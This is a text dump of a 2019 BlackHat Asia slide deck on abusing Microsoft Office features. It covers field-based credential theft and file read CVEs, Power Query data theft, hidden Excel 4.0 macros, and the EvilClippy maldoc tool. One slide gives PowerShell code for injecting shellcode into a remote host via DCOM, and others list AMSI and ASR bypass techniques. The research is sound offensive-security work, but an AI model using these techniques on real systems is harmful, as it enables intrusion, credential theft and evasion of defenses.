MS Office in Wonderland

HackerNews

2019/05/10 发布于 科学 分类

文字内容
1. MS OFFICE IN WONDERLAND Stan Hegt & Pieter Ceelen BlackHat Asia, March 2019
2. Pieter Stan Most MS Office malware focusses on well-known tricks such as DDE and VBA macros. But there is so much more functionality in Word and Excel that can be abused. We’ll take you on a journey down the rabbit hole!
3. WHO NEEDS CODE EXECUTION ANYWAY?
4. ABOUT FIELDS www.outflank.nl 3
5. INCLUDEPICTURE www.outflank.nl 4
6. CREDENTIAL THEFT CVE-2019-0540
7. CVE-2019-0540 – CREDENTIAL THEFT - In the header of a DotX file - INCLUDEPICTURE URL is made dynamic by adding the USERNAME field - Word does not continue loading as long as picture is not loaded www.outflank.nl 6
8. ARBITRARY FILE READ CVE-2019-0561
9. CVE-2019-0561 – ARBITRARY FILE READING (1/2) A revisit to CVE2002-1143 In 2002, an includetext could read an arbitrary file. MS Fix: the includetext field is not updated in various events and as such is no longer dynamic. Or is it still ...? www.outflank.nl 8
10. CVE-2019-0561 – ARBITRARY FILE READING (2/2) www.outflank.nl 9
11. MITIGATION www.outflank.nl 10
12. MEET M GET&TRANSFROM ABUSE
13. GIVE ME THE POWER! Fields are old school and patched… Now same tricks with new school techniques www.outflank.nl 12
14. STEALING UNATTEND.XML . GET&TRANSFORM query definition in M, retrieves unattend.xml Column A: Retrieving data from file (GET&TRANSFORM) www.outflank.nl Column B: Posting results (WEBSERVICE, max 2048 chars)
15. WHAT ELSE CAN BE DONE? Ongoing research, there is a lot more to retrieve using this feature www.outflank.nl 14
16. WHO NEEDS VBA FOR MACROS ANYWAY?
17. ENTERING THE MACRO RABBIT HOLE VBA != Macros There are at least two macro languages supported by MS Office • Visual Basic for Applications (VBA) • Excel 4.0 macro’s (XLM, only in Excel) VBA != VBA For VBA there are 2 intermediary languages • P-code • Exe-codes www.outflank.nl 16
18. HOW TO INSERT AN XLM MACRO www.outflank.nl 17
20. HIDING YOUR EXCEL 4.0 MACRO www.outflank.nl 19
21. HIDING YOUR EXCEL 4.0 MACRO Can be achieved with one line of VBA: ActiveSheet.Visible = xlSheetVeryHidden Then remove VBA code and save the Excel file www.outflank.nl 20
22. AV INDUSTRY FORGOT ABOUT 1992 TECHNOLOGY www.outflank.nl 21
23. XLM VIA SYLK XLM macros also supported in SYLK files • Text-based file format which originates from the 80s • SYLK (.slk) files never open in protected mode sandbox! • Turned out to be an RCE on MS Office 2011 for Mac (won’t fix) Integrated into SharpShooter by MDSec: https://github.com/mdsecactivebreach/SharpShooter/blob/master/modules/excel4.py www.outflank.nl 22
24. XLM EXPOSURE VIA (D)COM Shellcode injection into remote system with XLM via ExecuteExcel4Macro $excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application", "server01")); $memaddr = $excel.ExecuteExcel4Macro('CALL("Kernel32","VirtualAlloc","JJJJJ",0,833,4096,64)'); $ret = $excel.ExecuteExcel4Macro('CALL("Kernel32","WriteProcessMemory","JJJCJJ",-1, ' + ($memaddr + 0) + ', ' + "CHAR`(252`)" + ', 1, 0)’); ... $ret = $excel.ExecuteExcel4Macro('CALL("Kernel32","WriteProcessMemory","JJJCJJ",-1, ' + ($memaddr + 832) + ', ' + "CHAR`(232`)" + ', 1, 0)'); $excel.ExecuteExcel4Macro('CALL("Kernel32","CreateThread","JJJJJJJ",0, 0, ' + $memaddr + ', 0, 0, 0)’); Powershell and Cobalt Strike implementations available at: https://github.com/outflanknl/Excel4-DCOM www.outflank.nl 23
25. P-CODE www.outflank.nl 24
26. INTRODUCING EVIL CLIPPY It looks like your maldoc does not yet bypass AV. Do you want me to help? https://github.com/outflanknl/EvilClippy www.outflank.nl 25
27. EVIL CLIPPY FEATURES Current features • Cross-platform (runs on OSX, Linux, Windows) • Hide macros from GUI editor • Fool analyst tools by removing module names • VBA stomping (p-code abuse) • Serve payloads via HTTP templates Available at https://github.com/outflanknl/EvilClippy www.outflank.nl 26
28. HOW EFFECTIVE IS THIS? (BEFORE CLIPPY) www.outflank.nl 27
29. HOW EFFECTIVE IS THIS? (AFTER CLIPPY) www.outflank.nl 28
30. BYPASSING MODERN DEFENSES: AMSI & ASR
31. VBA & ANTIMALWARE SCANNING INTERFACE Any COM method or Specific triggers Win32 API call (Shell etc) AMSI also catches pcode MacroRuntimeScope: Disable, Low Trust documents, All documents www.outflank.nl 30
32. BYPASSING AMSI FOR MACROS Technique Example Procedures Abuse non-VBA functionality • • Fields & Powerquery Excel 4.0 macros Execution outside of MacroRuntimeScope • Drop malicious code into trusted locations Non-trigger COM & Win32 API functions • • Application.ExecuteExcel4macro CreateObject ”Excel.application” and calling DDEInitialize WMI Spawninstance • VBA functions that are not in AMSI logs (not COM & not Win32 API) www.outflank.nl • • Application.Sendkeys A macro creates a .bat and .reg in startup by using Word saveas .txt, reg key disables AMSI by altering MacroRuntimeScope 31
33. ATTACK SURFACE REDUCTION RULES Rules enforced by Windows Defender Exploit Guard Block Win32 API calls from Office macro (static rule) Bypass:'>Bypass: invoke API calls without VBA signature using ExecuteExcel4Macro Block all Office applications from creating child processes (dynamic rule) Bypass:'>Bypass: let another process do the dirty job, such as the running instance of explorer.exe (can be achieved via COM and WMI) www.outflank.nl 32
34. RELATED RESEARCH • MS Office Magic Show (DerbyCon 2018) https://outflank.nl/blog/2018/10/28/recordings-of-our-derbycon-andbrucon-presentations/ • MS Office File Format Sorcery (TROOPERS19) Video recording to be released • VBA stomping by Walmart team https://vbastomp.com • Pcodedmp tool by Dr. Bontchev https://github.com/bontchev/pcodedmp • SharpShooter by Dominic Chell (MDSec) https://www.mdsec.co.uk/2019/02/macros-and-more-withsharpshooter-v2-0/ • Office lateral movement and DCOM by Philip Tsukerman (Cybereason) https://www.cybereason.com/blog/dcom-lateral-movement-techniques www.outflank.nl 33
35. Pieter Ceelen Stan Hegt @PtrPieter @StanHacked +31 6 5157 2696 pieter@outflank.nl www.outflank.nl/pieter +31 6 1188 5039 stan@outflank.nl www.outflank.nl/stan